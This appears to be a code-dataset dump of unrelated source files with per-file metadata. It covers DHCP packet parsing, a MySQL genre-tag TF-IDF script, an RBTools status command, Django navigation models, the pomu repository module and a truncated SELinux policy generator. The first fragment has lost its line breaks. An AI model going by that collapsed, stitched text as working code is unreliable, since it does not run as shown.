udp.parse_header(udp_header) # endregion # region Could not parse UDP header - break if udp_header is None: break # endregion # region DHCP packet if udp_header_dict['destination-port'] == 67 and udp_header_dict['source-port'] == 68: # region Parse DHCP packet dhcp_packet_offset = udp_header_offset + udp.header_length dhcp_packet = packet[dhcp_packet_offset:] dhcp_packet_dict = dhcp.parse_packet(dhcp_packet) # endregion # region Could not parse DHCP packet - break if dhcp_packet_dict is None: break # endregion # region Call function with full DHCP packet full_dhcp_packet = { 'Ethernet': ethernet_header_dict, 'IP': ip_header_dict, 'UDP': udp_header_dict } full_dhcp_packet.update(dhcp_packet_dict) reply(full_dhcp_packet) # endregion # endregion # endregion # endregion # endregion # endregion # region Exception - KeyboardInterrupt except KeyboardInterrupt: Base.print_info("Exit") exit(0) # endregion # endregion # endregion # endregion
unlicense
2,859,265,539,066,611,700
41.478261
131
0.544649
false
4.269039
false
false
false
jadhavhninad/-CSE_515_MWD_Analytics-
Phase 1/Project Code/phase1_code/differentiate_genre.py
1
17298
from mysqlConn import DbConnect import argparse import operator from math import log,fabs import pprint #DB connector and curosor db = DbConnect() db_conn = db.get_connection() cur2 = db_conn.cursor(); #Argument parser parser = argparse.ArgumentParser() parser.add_argument("GENRE1") parser.add_argument("GENRE2") parser.add_argument("MODEL") args = parser.parse_args() ########################################## #General computation ######################################### #1. Getting total number of movies in genre1 U genre2 cur2.execute("SELECT COUNT(distinct movieid) FROM mlmovies_clean where genres=%s || genres=%s",[args.GENRE1,args.GENRE2]) result0 = cur2.fetchone() total_movie_count = float(result0[0]) if args.MODEL== "TF-IDF-DIFF": ############################### #MODEL = TF_IDF_DIFF ############################### #=============================================================================================== #Subtask-1 : Calculate the weighted unique movies count returned by a tag for set of movies in genre1 U genre2 #=============================================================================================== cur2.execute("SELECT COUNT(distinct movieid) FROM mlmovies_clean where genres=%s || genres=%s",[args.GENRE1,args.GENRE2]) result0 = cur2.fetchone() total_movie_count = result0[0] #Since we already have the TF value and it's data, we now generate the required data for idf. #IDF here will be considered as the number of movie-genre that belong to a certain tag. So the idf calculation will be # Total movie-genres / sum of weight of movie-genre with a particular tag #Calculate the total weighted count for movie-genre count for each tag. #weighted count for an occurance of a tag = tag_newness weighted_genre_movie_count={} cur2.execute("SELECT movieid FROM `mlmovies_clean` where genres=%s || genres=%s",[args.GENRE1,args.GENRE2]) result1 = cur2.fetchall() for data1 in result1: #print data1 genre_movie_id = data1[0] genre_tag_id="" #Select distint tagIDs for the movieID cur2.execute("SELECT tagid,newness_wt_norm_nolog FROM mltags WHERE movieid = %s",[genre_movie_id]) result2 = cur2.fetchall() for data2 in result2: genre_tag_id = data2[0] genre_tag_newness = data2[1] #Get the tag_name for the tagID. For each tag weight, add the rank_weight as well. cur2.execute("SELECT tag FROM `genome-tags` WHERE tagID = %s", [genre_tag_id]) result2_sub = cur2.fetchone() tagName = result2_sub[0] tagWeight = round((float(genre_tag_newness)),10) if tagName in weighted_genre_movie_count: weighted_genre_movie_count[tagName] = round((weighted_genre_movie_count[tagName] + tagWeight), 10) else: weighted_genre_movie_count[tagName] = tagWeight # =============================================================================== #Subtask-2: Get the TF , IDF and TF-IDF for the genres #=============================================================================== data_dictionary_tf_genre1 = {} data_dictionary_tf_idf_genre1 = {} total_tag_newness_weight = 0 #Get all movies of genre 1. cur2.execute("SELECT movieid FROM `mlmovies_clean` where genres = %s",[args.GENRE1]) result1 = cur2.fetchall() for data1 in result1: genre_movie_id = data1[0] #Select distint tagIDs for the movieID cur2.execute("SELECT tagid,newness_wt_norm_nolog FROM mltags WHERE movieid = %s",[genre_movie_id]) result2 = cur2.fetchall() for data2 in result2: genre_tag_id = data2[0] genre_tag_newness = data2[1] #Get the tag_name for the tagID. 
cur2.execute("SELECT tag FROM `genome-tags` WHERE tagID = %s", [genre_tag_id]) result2_sub = cur2.fetchone() tagName = result2_sub[0] tagWeight = round(float(genre_tag_newness),10) total_tag_newness_weight = total_tag_newness_weight + tagWeight #For TF if tagName in data_dictionary_tf_genre1: data_dictionary_tf_genre1[tagName] = round((data_dictionary_tf_genre1[tagName] + tagWeight),10) else: data_dictionary_tf_genre1[tagName] = tagWeight # Make weight of other tags to zero. Calculate the tf, idf and tf-idf values for the tags that exist. cur2.execute("SELECT tag FROM `genome-tags`") tagName = cur2.fetchall() for keyVal in tagName: key = keyVal[0] if key in data_dictionary_tf_genre1: data_dictionary_tf_genre1[key] = round((float(data_dictionary_tf_genre1[key]) / float(total_tag_newness_weight)),10) data_dictionary_tf_idf_genre1[key] = round((float(log((total_movie_count/weighted_genre_movie_count[key]),2.71828))), 10) data_dictionary_tf_idf_genre1[key] = round((data_dictionary_tf_genre1[key] * data_dictionary_tf_idf_genre1[key]), 10) else: data_dictionary_tf_genre1[key] = 0.0 #genre_model_value_tf_genre1 = sorted(data_dictionary_tf_genre1.items(), key=operator.itemgetter(1), reverse=True) #genre_model_value_tfidf_genre1 = sorted(data_dictionary_tf_genre1.items(), key=operator.itemgetter(1), reverse=True) #Get all movies of a specific genre 2. #-------------------------------------- data_dictionary_tf_genre2 = {} data_dictionary_tf_idf_genre2 = {} total_tag_newness_weight = 0 cur2.execute("SELECT movieid FROM `mlmovies_clean` where genres = %s",[args.GENRE2]) result1 = cur2.fetchall() for data1 in result1: genre_movie_id = data1[0] #Select distint tagIDs for the movieID cur2.execute("SELECT tagid,newness_wt_norm_nolog FROM mltags WHERE movieid = %s",[genre_movie_id]) result2 = cur2.fetchall() for data2 in result2: genre_tag_id = data2[0] genre_tag_newness = data2[1] #Get the tag_name for the tagID. cur2.execute("SELECT tag FROM `genome-tags` WHERE tagID = %s", [genre_tag_id]) result2_sub = cur2.fetchone() tagName = result2_sub[0] tagWeight = round(float(genre_tag_newness),10) total_tag_newness_weight = total_tag_newness_weight + tagWeight #For TF if tagName in data_dictionary_tf_genre2: data_dictionary_tf_genre2[tagName] = round((data_dictionary_tf_genre2[tagName] + tagWeight),10) else: data_dictionary_tf_genre2[tagName] = tagWeight # Make weight of other tags to zero. cur2.execute("SELECT tag FROM `genome-tags`") tagName = cur2.fetchall() for keyVal in tagName: key=keyVal[0] if key in data_dictionary_tf_genre2: data_dictionary_tf_genre2[key] = round((float(data_dictionary_tf_genre2[key]) / float(total_tag_newness_weight)),10) data_dictionary_tf_idf_genre2[key] = round((float(log((total_movie_count/weighted_genre_movie_count[key]),2.71828))), 10) data_dictionary_tf_idf_genre2[key] = round((data_dictionary_tf_genre2[key] * data_dictionary_tf_idf_genre2[key]), 10) else: data_dictionary_tf_genre2[key] = 0.0 #genre_model_value_tf_genre1 = sorted(data_dictionary_tf_genre1.items(), key=operator.itemgetter(1), reverse=True) #genre_model_value_tfidf_genre2 = sorted(data_dictionary_tf_genre2.items(), key=operator.itemgetter(1), reverse=True) #-------------------------------------------------------------------------------------------------------------- #Subtask-3 : Calculate the DIFF vector #Manhattan distance is used since for high dimensions it works better. 
compared to higher order minkowski distance diff_vector={} #Makes more sense to have +ve 0, and -ve as it clearly states the difference, between genre1 #and genre2. for key in data_dictionary_tf_idf_genre1: if key in data_dictionary_tf_idf_genre2: diff_vector[key] = data_dictionary_tf_idf_genre1[key] - data_dictionary_tf_idf_genre2[key] else: diff_vector[key] = data_dictionary_tf_idf_genre1[key] for key in data_dictionary_tf_idf_genre2: if key in diff_vector: continue else: diff_vector[key] = 0 - data_dictionary_tf_idf_genre2[key] cur2.execute("SELECT tag FROM `genome-tags`") tagName = cur2.fetchall() for keyVal in tagName: key = keyVal[0] if key in diff_vector: continue; else: diff_vector[key] = 0.0 genre_diff = sorted(diff_vector.items(), key=operator.itemgetter(1), reverse=True) #pprint.pprint(genre_model_value_tfidf_genre1) #pprint.pprint(genre_model_value_tfidf_genre2) pprint.pprint(genre_diff) elif args.MODEL == "P-DIFF1" : ############################### #MODEL = P-DIFF-1 ############################### # =============================================================================== #Subtask-1: Calculate the number of movies for a given tag for genre1 and genre2 #and total movies in genre1 #================================================================================ dd_r1_genre1 = {} dd_m1_genre2 = {} M = total_movie_count #Movies in genre1 U genre2 cur2.execute("SELECT count(movieid) FROM `mlmovies_clean` where genres = %s",[args.GENRE1]) result1 = cur2.fetchone() R = float(result1[0]) #Movies in genre1 #Calculation for genre1. r = movies in genre1 with tag t cur2.execute("SELECT movieid FROM `mlmovies_clean` where genres = %s",[args.GENRE1]) result1 = cur2.fetchall() for data1 in result1: genre_movie_id = data1[0] #Select distint tagIDs for the movieID cur2.execute("SELECT tagid FROM mltags WHERE movieid = %s",[genre_movie_id]) result2 = cur2.fetchall() for data2 in result2: genre_tag_id = data2[0] #Get the tag_name for the tagID. cur2.execute("SELECT tag FROM `genome-tags` WHERE tagID = %s", [genre_tag_id]) result2_sub = cur2.fetchone() tagName = result2_sub[0] #For TF if tagName in dd_r1_genre1: dd_r1_genre1[tagName] = (dd_r1_genre1[tagName] + 1) else: dd_r1_genre1[tagName] = 1 #Calculation for m=movies in genre1 U genre 2 with tag t cur2.execute("SELECT distinct(movieid) FROM `mlmovies_clean` where genres=%s || genres=%s",[args.GENRE1,args.GENRE2]) result1 = cur2.fetchall() for data1 in result1: genre_movie_id = data1[0] #Select distint tagIDs for the movieID cur2.execute("SELECT tagid FROM mltags WHERE movieid = %s",[genre_movie_id]) result2 = cur2.fetchall() for data2 in result2: genre_tag_id = data2[0] #Get the tag_name for the tagID. cur2.execute("SELECT tag FROM `genome-tags` WHERE tagID = %s", [genre_tag_id]) result2_sub = cur2.fetchone() tagName = result2_sub[0] #For TF if tagName in dd_m1_genre2: dd_m1_genre2[tagName] = (dd_m1_genre2[tagName] + 1) else: dd_m1_genre2[tagName] = 1 #print dd_r1_genre1 #print dd_m1_genre2 #Subtask:2 - Calculate the pdiff1 using the given formula pdiff_wt_genre1={} for tag in dd_m1_genre2: r=0 if tag in dd_r1_genre1: r = float(dd_r1_genre1[tag]) m = float(dd_m1_genre2[tag]) val1=0 val2=0 val3=0 val4=0 #r = 0 means that the tag never occurs for a genre. #R=r means that the tag occurs for every movie of the genre, so its frequency is 1 and #discriminating power is 0 . In both the scenarios, we ignore such a tag. #m>= r always since its a union. 
# Get the probability of the tag in M and add it to avoid edge cases- ref:Salton & buckley p_tag = float(m / M) #explain why you think square term comes in the picture.But as the max probability will be 1, the term does not make #much difference for values less than 1. val1 = float(float(r + p_tag)/(R-r+1)) val3 = float(float(r + p_tag)/(R + 1)) val2 = float((m-r+p_tag)/(M-m-R+r+1)) val4 = float((m-r+p_tag)/(M-R+1)) pdiff_wt_genre1[tag] = float(log(float(val1/val2),2)) * float(val3 - val4) #Make weight of other tags to zero cur2.execute("SELECT tag FROM `genome-tags`") tagName = cur2.fetchall() for keyval in tagName: key = keyval[0] if key in pdiff_wt_genre1: continue else: pdiff_wt_genre1[key] = 0 pprint.pprint(sorted(pdiff_wt_genre1.items(), key=operator.itemgetter(1), reverse=True)) elif args.MODEL == "P-DIFF2": ############################### #MODEL = P-DIFF-2 ############################### # =============================================================================== #Subtask-1: Calculate the number of movies for a given tag for genre1 and genre2 #and total movies in genre2 #================================================================================ dd_r1_genre1 = {} dd_m1_genre2 = {} M = total_movie_count #Movies in genre1 U genre2 cur2.execute("SELECT count(movieid) FROM `mlmovies_clean` where genres = %s",[args.GENRE2]) result1 = cur2.fetchone() R = float(result1[0]) #Movies in genre1 #Calculation for genre2. r = movies in genre2 without tag t. We first get the value of movies in genre2 with tag t then #subtract that value from total movies there in genre2, for each tag cur2.execute("SELECT movieid FROM `mlmovies_clean` where genres = %s",[args.GENRE2]) result1 = cur2.fetchall() for data1 in result1: genre_movie_id = data1[0] #Select distint tagIDs for the movieID cur2.execute("SELECT tagid FROM mltags WHERE movieid = %s",[genre_movie_id]) result2 = cur2.fetchall() for data2 in result2: genre_tag_id = data2[0] #Get the tag_name for the tagID. cur2.execute("SELECT tag FROM `genome-tags` WHERE tagID = %s", [genre_tag_id]) result2_sub = cur2.fetchone() tagName = result2_sub[0] #For TF if tagName in dd_r1_genre1: dd_r1_genre1[tagName] = (dd_r1_genre1[tagName] + 1) else: dd_r1_genre1[tagName] = 1 #Calculation for genre2. m=movies in genre1 U genre 2 without tag t. Subtract later from M to get movies in genre1 or genre2 #without a tag cur2.execute("SELECT distinct(movieid) FROM `mlmovies_clean` where genres=%s || genres=%s",[args.GENRE1,args.GENRE2]) result1 = cur2.fetchall() for data1 in result1: genre_movie_id = data1[0] #Select distint tagIDs for the movieID cur2.execute("SELECT tagid FROM mltags WHERE movieid = %s",[genre_movie_id]) result2 = cur2.fetchall() for data2 in result2: genre_tag_id = data2[0] #Get the tag_name for the tagID. cur2.execute("SELECT tag FROM `genome-tags` WHERE tagID = %s", [genre_tag_id]) result2_sub = cur2.fetchone() tagName = result2_sub[0] #For TF if tagName in dd_m1_genre2: dd_m1_genre2[tagName] = (dd_m1_genre2[tagName] + 1) else: dd_m1_genre2[tagName] = 1 #Subtask:2 - Calculate the pdiff1 using the given formula pdiff_wt_genre1={} for tag in dd_m1_genre2: r = R if tag in dd_r1_genre1: r = R - float(dd_r1_genre1[tag]) m = M - float(dd_m1_genre2[tag]) val1=0 val2=0 val3=0 val4=0 #r = 0 means that the tag never occurs for a genre. #R=r means that the tag occurs for every movie of the genre, so its frequency is 1 and #discriminating power is 0 . In both the scenarios, we ignore such a tag. #m>= r always since its a union. 
# Get the probability of the tag not in M and add it to avoid edge cases- ref:Salton & buckley p_tag = float(m / M) #explain why you think square term comes in the picture.But as the max probability will be 1, the term does not make #much difference for values less than 1. val1 = float(float(r + p_tag)/(R-r+1)) val3 = float(float(r + p_tag)/(R + 1)) val2 = float((m-r+p_tag)/(M-m-R+r+1)) val4 = float((m-r+p_tag)/(M-R+1)) pdiff_wt_genre1[tag] = float(log(float(val1/val2),2)) * (float(val3 - val4)) #Make weight of other tags to zero cur2.execute("SELECT tag FROM `genome-tags`") tagName = cur2.fetchall() for keyval in tagName: key = keyval[0] if key in pdiff_wt_genre1: continue else: pdiff_wt_genre1[key] = 0 pprint.pprint(sorted(pdiff_wt_genre1.items(), key=operator.itemgetter(1), reverse=True))
gpl-3.0
3,274,444,029,248,706,600
33.875
133
0.578737
false
3.541044
false
false
false
brettdh/rbtools
rbtools/commands/status.py
1
2506
import logging

from rbtools.commands import Command, Option
from rbtools.utils.repository import get_repository_id
from rbtools.utils.users import get_username


class Status(Command):
    """Display review requests for the current repository."""
    name = "status"
    author = "The Review Board Project"
    description = "Output a list of your pending review requests."
    args = ""
    option_list = [
        Option("--all",
               dest="all_repositories",
               action="store_true",
               default=False,
               help="Show review requests for all repositories instead "
                    "of the detected repository."),
        Command.server_options,
        Command.repository_options,
        Command.perforce_options,
    ]

    def output_request(self, request):
        print " r/%s - %s" % (request.id, request.summary)

    def output_draft(self, request, draft):
        print " * r/%s - %s" % (request.id, draft.summary)

    def main(self):
        repository_info, tool = self.initialize_scm_tool(
            client_name=self.options.repository_type)
        server_url = self.get_server_url(repository_info, tool)
        api_client, api_root = self.get_api(server_url)
        self.setup_tool(tool, api_root=api_root)

        username = get_username(api_client, api_root, auth_required=True)

        query_args = {
            'from_user': username,
            'status': 'pending',
            'expand': 'draft',
        }

        if not self.options.all_repositories:
            repo_id = get_repository_id(
                repository_info,
                api_root,
                repository_name=self.options.repository_name)

            if repo_id:
                query_args['repository'] = repo_id
            else:
                logging.warning('The repository detected in the current '
                                'directory was not found on\n'
                                'the Review Board server. Displaying review '
                                'requests from all repositories.')

        requests = api_root.get_review_requests(**query_args)

        try:
            while True:
                for request in requests:
                    if request.draft:
                        self.output_draft(request, request.draft[0])
                    else:
                        self.output_request(request)

                requests = requests.get_next(**query_args)
        except StopIteration:
            pass
mit
7,896,034,050,389,022,000
33.805556
77
0.553472
false
4.523466
false
false
false
mennanov/django-blueprint
project_name/apps/navigation/models.py
1
1661
# -*- coding: utf-8 -*-
from django.db import models
from django.utils.translation import ugettext_lazy as _
from mptt.models import TreeForeignKey, TreeManyToManyField, MPTTModel


class Navigation(models.Model):
    """
    Navigation menu
    """
    key = models.CharField(_(u'key'), max_length=32, help_text=_(u'This value is used in the code, do not touch it!'))
    name = models.CharField(_(u'name'), max_length=70)
    links = TreeManyToManyField('Link', verbose_name=_(u'links'), through='LinkMembership')

    def __unicode__(self):
        return self.name

    class Meta:
        verbose_name = _(u'navigation menu')
        verbose_name_plural = _(u'navigation menus')


class Link(MPTTModel):
    """
    Navigation link
    """
    parent = TreeForeignKey('self', verbose_name=_(u'parent link'), null=True, blank=True)
    name = models.CharField(_(u'name'), max_length=70, help_text=_(u'Name of the link in the menu'))
    url = models.CharField(_(u'url'), max_length=255, help_text=_(u'Example: "/about/" or "/"'))

    def __unicode__(self):
        return self.name

    def get_absolute_url(self):
        return self.url

    class Meta:
        verbose_name = _(u'navigation link')
        verbose_name_plural = _(u'navigation links')


class LinkMembership(models.Model):
    """
    Link in navigation membership
    """
    navigation = models.ForeignKey('Navigation')
    link = TreeForeignKey('Link')
    position = models.PositiveIntegerField(_(u'position'), default=0, db_index=True)

    class Meta:
        ordering = ['position']
        verbose_name = _(u'link membership')
        verbose_name_plural = _(u'link memberships')
gpl-2.0
-8,933,735,953,260,462,000
30.358491
118
0.64118
false
3.862791
false
false
false
Hummer12007/pomu
pomu/repo/repo.py
1
9456
"""Subroutines with repositories""" from os import path, rmdir, makedirs from shutil import copy2 from git import Repo from patch import PatchSet import portage from pomu.package import Package, PatchList from pomu.util.cache import cached from pomu.util.fs import remove_file, strip_prefix from pomu.util.result import Result class Repository(): def __init__(self, root, name=None): """ Parameters: root - root of the repository name - name of the repository """ if not pomu_status(root): raise ValueError('This path is not a valid pomu repository') self.root = root self.name = name @property def repo(self): return Repo(self.root) @property def pomu_dir(self): return path.join(self.root, 'metadata/pomu') def merge(self, mergeable): """Merges a package or a patchset into the repository""" if isinstance(mergeable, Package): return self.merge_pkg(mergeable) elif isinstance(mergeable, PatchList): pkg = self.get_package(mergeable.name, mergeable.category, mergeable.slot).unwrap() return pkg.patch(mergeable.patches) return Result.Err() #unreachable yet def merge_pkg(self, package): """Merge a package (a pomu.package.Package package) into the repository""" r = self.repo pkgdir = path.join(self.pomu_dir, package.category, package.name) if package.slot != '0': pkgdir = path.join(pkgdir, package.slot) package.merge_into(self.root).expect('Failed to merge package') for wd, f in package.files: r.index.add([path.join(wd, f)]) manifests = package.gen_manifests(self.root).expect() for m in manifests: r.index.add([m]) self.write_meta(pkgdir, package, manifests) with open(path.join(self.pomu_dir, 'world'), 'a+') as f: f.write('{}/{}'.format(package.category, package.name)) f.write('\n' if package.slot == '0' else ':{}\n'.format(package.slot)) r.index.add([path.join(self.pomu_dir, package.category, package.name)]) r.index.add([path.join(self.pomu_dir, 'world')]) r.index.commit('Merged package ' + package.name) return Result.Ok('Merged package ' + package.name + ' successfully') def write_meta(self, pkgdir, package, manifests): """ Write metadata for a Package object Parameters: pkgdir - destination directory package - the package object manifests - list of generated manifest files """ makedirs(pkgdir, exist_ok=True) with open(path.join(pkgdir, 'FILES'), 'w+') as f: for wd, fil in package.files: f.write('{}/{}\n'.format(wd, fil)) for m in manifests: f.write('{}\n'.format(strip_prefix(m, self.root))) if package.patches: patch_dir = path.join(pkgdir, 'patches') makedirs(patch_dir, exist_ok=True) with open(path.join(pkgdir, 'PATCH_ORDER'), 'w') as f: for patch in package.patches: copy2(patch, patch_dir) f.write(path.basename(patch) + '\n') if package.backend: with open(path.join(pkgdir, 'BACKEND'), 'w+') as f: f.write('{}\n'.format(package.backend.__cname__)) package.backend.write_meta(pkgdir) with open(path.join(pkgdir, 'VERSION'), 'w+') as f: f.write(package.version) def unmerge(self, package): """Remove a package (by contents) from the repository""" r = self.repo for wd, f in package.files: dst = path.join(self.root, wd) remove_file(r, path.join(dst, f)) try: rmdir(dst) except OSError: pass pf = path.join(self.pomu_dir, package.name) if path.isfile(pf): remove_file(r, pf) r.commit('Removed package ' + package.name + ' successfully') return Result.Ok('Removed package ' + package.name + ' successfully') def remove_package(self, name): """Remove a package (by name) from the repository""" pkg = self.get_package(name).expect() return self.unmerge(pkg) def update_package(self, category, name, new): """Updates a 
package, replacing it by a newer version""" pkg = self.get_package(category, name).expect() self.unmerge(pkg).expect() self.merge(new) def _get_package(self, category, name, slot='0'): """Get an existing package (by category, name and slot), reading the manifest""" from pomu.source import dispatcher if slot == '0': pkgdir = path.join(self.pomu_dir, category, name) else: pkgdir = path.join(self.pomu_dir, category, name, slot) backend = None if path.exists(path.join(pkgdir, 'BACKEND')): with open(path.join(pkgdir, 'BACKEND'), 'r') as f: bname = f.readline().strip() backend = dispatcher.backends[bname].from_meta_dir(pkgdir) if backend.is_err(): return backend backend = backend.ok() with open(path.join(pkgdir, 'VERSION'), 'r') as f: version = f.readline().strip() with open(path.join(pkgdir, 'FILES'), 'r') as f: files = [x.strip() for x in f] patches=[] if path.isfile(path.join(pkgdir, 'PATCH_ORDER')): with open(path.join(pkgdir, 'PATCH_ORDER'), 'r') as f: patches = [x.strip() for x in f] pkg = Package(name, self.root, backend, category=category, version=version, slot=slot, files=files, patches=[path.join(pkgdir, 'patches', x) for x in patches]) pkg.__class__ = MergedPackage return Result.Ok(pkg) def get_package(self, name, category=None, slot=None): """Get a package by name, category and slot""" with open(path.join(self.pomu_dir, 'world'), 'r') as f: for spec in f: spec = spec.strip() cat, _, nam = spec.partition('/') nam, _, slo = nam.partition(':') if (not category or category == cat) and nam == name: if not slot or (slot == '0' and not slo) or slot == slo: return self._get_package(category, name, slot or '0') return Result.Err('Package not found') def get_packages(self): with open(path.join(self.pomu_dir, 'world'), 'r') as f: lines = [x.strip() for x in f.readlines() if x.strip() != ''] return lines def portage_repos(): """Yield the repositories configured for portage""" rsets = portage.db[portage.root]['vartree'].settings.repositories for repo in rsets.prepos_order: yield repo def portage_repo_path(repo): """Get the path of a given portage repository (repo)""" rsets = portage.db[portage.root]['vartree'].settings.repositories if repo in rsets.prepos: return rsets.prepos[repo].location return None def pomu_status(repo_path): """Check if pomu is enabled for a repository at a given path (repo_path)""" return path.isdir(path.join(repo_path, 'metadata', 'pomu')) def pomu_active_portage_repo(): """Returns a portage repo, for which pomu is enabled""" for repo in portage_repos(): if pomu_status(portage_repo_path(repo)): return repo return None @cached def pomu_active_repo(no_portage=None, repo_path=None): """Returns a repo for which pomu is enabled""" if no_portage: if not repo_path: return Result.Err('repo-path required') if pomu_status(repo_path): return Result.Ok(Repository(repo_path)) return Result.Err('pomu is not initialized') else: repo = pomu_active_portage_repo() if repo: return Result.Ok(Repository(portage_repo_path(repo), repo)) return Result.Err('pomu is not initialized') class MergedPackage(Package): @property def pkgdir(self): ret = path.join(self.root, 'metadata', 'pomu', self.category, self.name) if self.slot != '0': ret = path.join(ret, self.slot) return ret def patch(self, patch): if isinstance(patch, list): for x in patch: self.patch(x) return Result.Ok() ps = PatchSet() ps.parse(open(patch, 'r')) ps.apply(root=self.root) self.add_patch(patch) return Result.Ok() @property def patch_list(self): with open(path.join(self.pkgdir, 'PATCH_ORDER'), 'r') as f: lines = [x.strip() for x in 
f.readlines() if x.strip() != ''] return lines def add_patch(self, patch, name=None): # patch is a path, unless name is passed patch_dir = path.join(self.pkgdir, 'patches') makedirs(patch_dir, exist_ok=True) if name is None: copy2(patch, patch_dir) with open(path.join(self.pkgdir, 'PATCH_ORDER'), 'w+') as f: f.write(path.basename(patch) + '\n') else: with open(path.join(patch_dir, name), 'w') as f: f.write(patch) with open(path.join(self.pkgdir, 'PATCH_ORDER'), 'w+') as f: f.write(name + '\n')
gpl-2.0
5,766,960,781,250,393,000
38.07438
167
0.579315
false
3.702428
false
false
false
Siosm/contextd-capture
piga-systrans/selaudit/selaudit.py
2
25513
#!/usr/bin/python3 # -*- coding: utf-8 -*- # Configuration # Templates basepolname = 'template/module' base_transpol_name = 'template/temp_transition' makefile_path = 'template/Makefile' # Default value for the template variables user_u_default = 'user_u' user_r_default = 'user_r' user_t_default = 'user_t' module_domain_t_default_pattern = 'user_%modulename%_t' module_exec_t_default_pattern = '%modulename%_exec_t' module_tmp_domain_t_default_pattern = '%modulename%_tmp_t' module_log_domain_t_default_pattern = '%modulename%_log_t' # Selpolgen user selpolgen_u_default = 'root' selpolgen_r_default = 'sysadm_r' selpolgen_t_default = 'sysadm_t' # Programs fullpath semodule_path = '/usr/sbin/semodule' make_path = '/usr/bin/make' setfilecon_path = '/usr/sbin/setfilecon' runcon_path = '/usr/bin/runcon' audit2allow_path = '/usr/bin/audit2allow' dmesg_path = '/bin/dmesg' strace_path = '/usr/bin/strace' ls_path = '/bin/ls' setfiles_path = '/sbin/setfiles' # /Configuration # Import import getopt import re, string, sys import os, signal import glob import subprocess import shutil import time from pigi import * # Global variables verbosity = 0 wantToAbort = False # functions def log(priority, msg): if priority <= verbosity: print(msg) def handler(signum, frame): global wantToAbort wantToAbort = True def mkdir_p(path): if not os.path.exists (path): os.makedirs (path) def getPolicyPath(module_name, extension=''): if len(extension) > 0: return "policies/%s/%s.%s" % (module_name, module_name, extension) else: return "policies/%s/" % module_name def getTempModuleTransitionPath(module_name, extension=''): if len(extension) > 0: return "temp/%s/%s.%s" % (module_name, module_name, extension) else: return "temp/%s/" % module_name def loadSELinuxModule(module_path_pp): proc = subprocess.Popen([semodule_path, '-i', module_path_pp], stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout,stderr = proc.communicate() if proc.returncode != 0: print("----\nError while loading the SELinux module '%s':\n<stdout>%s</stdout>\n<stderr>%s</stderr>\n----" % (module_path_pp, stdout, stderr), file=sys.stderr) return False else: return True def unloadSELinuxModule(module_name): proc = subprocess.Popen([semodule_path, '-r', module_name], stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout,stderr = proc.communicate() if proc.returncode != 0: print("----\nError while unloading the SELinux module '%s':\n<stdout>%s</stdout>\n<stderr>%s</stderr>\n----" % (module_name, stdout, stderr), file=sys.stderr) return False else: return True def reloadSELinuxModule(module_name): if unloadSELinuxModule(module_name): if loadSELinuxModule(getPolicyPath(module_name, "pp")): return True else: return False else: return False def compileAndLoadSELinuxModule(module_dir): proc = subprocess.Popen([make_path, 'load'], cwd=module_dir, stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout,stderr = proc.communicate() if proc.returncode != 0: print("----\nError while compiling and loading the module at '%s':\n<stdout>%s</stdout>\n<stderr>%s</stderr>\n----" % (module_dir, stdout, stderr), file=sys.stderr) return False else: return True def generateBasePolicy(module_name, app_path, module_domain_t, module_tmp_domain_t, module_log_domain_t, module_exec_t, user_u, user_r, user_t, permissive_mode=False): #TODO add exceptions handling. 
It's fine for the moment as these exceptions are fatal for the program # Get the template template_te = open("%s.te" % basepolname, "r").read() template_if = open("%s.if" % basepolname, "r").read() template_fc = open("%s.fc" % basepolname, "r").read() if len(template_te) == 0: return '' if permissive_mode: template_te += "permissive ${module_domain_t};" # Replace the template variables by our values dico=dict({"module": module_name, "app_path": app_path, "module_domain_t": module_domain_t, "module_tmp_domain_t": module_tmp_domain_t, "module_log_domain_t": module_log_domain_t, "module_exec_t": module_exec_t, "user_u": user_u, "user_r": user_r, "user_t": user_t}) for key in dico.keys(): template_te=template_te.replace("${%s}" % key, dico[key]) template_if=template_if.replace("${%s}" % key, dico[key]) template_fc=template_fc.replace("${%s}" % key, dico[key]) # Create a directory for the output module mkdir_p(getPolicyPath(module_name, "")) # write the output module there file_te = open(getPolicyPath(module_name, "te"), "w").write(template_te) file_if = open(getPolicyPath(module_name, "if"), "w").write(template_if) file_fc = open(getPolicyPath(module_name, "fc"), "w").write(template_fc) # Copy the Makefile shutil.copyfile(makefile_path, "%sMakefile" % getPolicyPath(module_name, "")) return getPolicyPath(module_name) def generateAuditPolicy(module_name, app_path, module_domain_t, module_exec_t, user_u, user_r, user_t): #TODO add exceptions handling. It's fine for the moment as these exceptions are fatal for the program module_name = "selpolgen-%s" % module_name # Get the template template_te = open("%s.te" % base_transpol_name, "r").read() template_if = open("%s.if" % base_transpol_name, "r").read() template_fc = open("%s.fc" % base_transpol_name, "r").read() if len(template_te) == 0: return '' # Replace the template variables by our values dico=dict({"module": module_name, "app_path": app_path, "module_domain_t": module_domain_t, "module_exec_t": module_exec_t, "user_u": user_u, "user_r": user_r, "user_t": user_t}) for key in dico.keys(): template_te=template_te.replace("${%s}" % key, dico[key]) template_if=template_if.replace("${%s}" % key, dico[key]) template_fc=template_fc.replace("${%s}" % key, dico[key]) # Remove the directory for the output module try: shutil.rmtree(getTempModuleTransitionPath(module_name, "")) except: pass # Create a directory for the output module mkdir_p(getTempModuleTransitionPath(module_name, "")) # write the output module there file_te = open(getTempModuleTransitionPath(module_name, "te"), "w").write(template_te) file_if = open(getTempModuleTransitionPath(module_name, "if"), "w").write(template_if) file_fc = open(getTempModuleTransitionPath(module_name, "fc"), "w").write(template_fc) # Copy the Makefile shutil.copyfile(makefile_path, "%sMakefile" % getTempModuleTransitionPath(module_name, "")) return getTempModuleTransitionPath(module_name) def setFileSELinuxContext(user_u, role_r, type_t, filepath): context = '%s:%s:%s' % (user_u, role_r, type_t) proc = subprocess.Popen([setfilecon_path, context, filepath], stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout,stderr = proc.communicate() if proc.returncode != 0: print("Error while setting the context %s to the file '%s':\n<stdout>%s</stdout>\n<stderr>%s</stderr>" % (context, filepath, stdout, stderr), file=sys.stderr) return False else: return True def getAudit2AllowRules(domain_t): rules = [] proc = subprocess.Popen([audit2allow_path, "-d"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout,stderr = 
